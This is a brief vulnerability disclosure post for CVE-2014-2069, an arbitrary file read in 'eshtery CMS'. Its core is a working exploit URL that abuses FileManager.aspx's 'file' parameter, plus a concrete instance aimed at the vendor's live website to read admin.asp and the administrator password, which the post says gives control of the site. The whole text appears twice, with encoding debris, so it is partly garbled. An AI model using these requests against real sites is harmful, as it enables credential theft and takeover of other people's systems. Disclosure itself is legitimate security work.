Hi All,
    [CVE-2014-2069]
'eshtery CMS' allows remote attackers to read arbitrary files,Since I am unable to contact the relevant manufacturers, all I'll send you the details vulnerabilities, as follows:      [»] Language:          [ ASP and aspx ]
    [»] Version:           [ version update: 2013-04-03 (http://sourceforge.net/projects/eshtery/) ]########################################################################### ===[ Exploit ]===     [»] http://server/[path]/FileManager.aspx?file=E:\web\admin.asp        Examples are the official website:        http://eshtery.she7ata.com/projects/eshtery//FileManager.aspx?file=E:\web\she7atac\admin.asp                 Administrator password to use to read, we can successfully control site management background, a very serious problem       Â
    [CVE-2014-2069]
'eshtery CMS' allows remote attackers to read arbitrary files,Since I am unable to contact the relevant manufacturers, all I'll send you the details vulnerabilities, as follows:      [»] Language:          [ ASP and aspx ]
    [»] Version:           [ version update: 2013-04-03 (http://sourceforge.net/projects/eshtery/) ]########################################################################### ===[ Exploit ]===     [»] http://server/[path]/FileManager.aspx?file=E:\web\admin.asp        Examples are the official website:        http://eshtery.she7ata.com/projects/eshtery//FileManager.aspx?file=E:\web\she7atac\admin.asp                 Administrator password to use to read, we can successfully control site management background, a very serious problem       Â
Attached Files:
-
Catch.jpg (124 KB)
-
CatchEA2A.jpg (140 KB)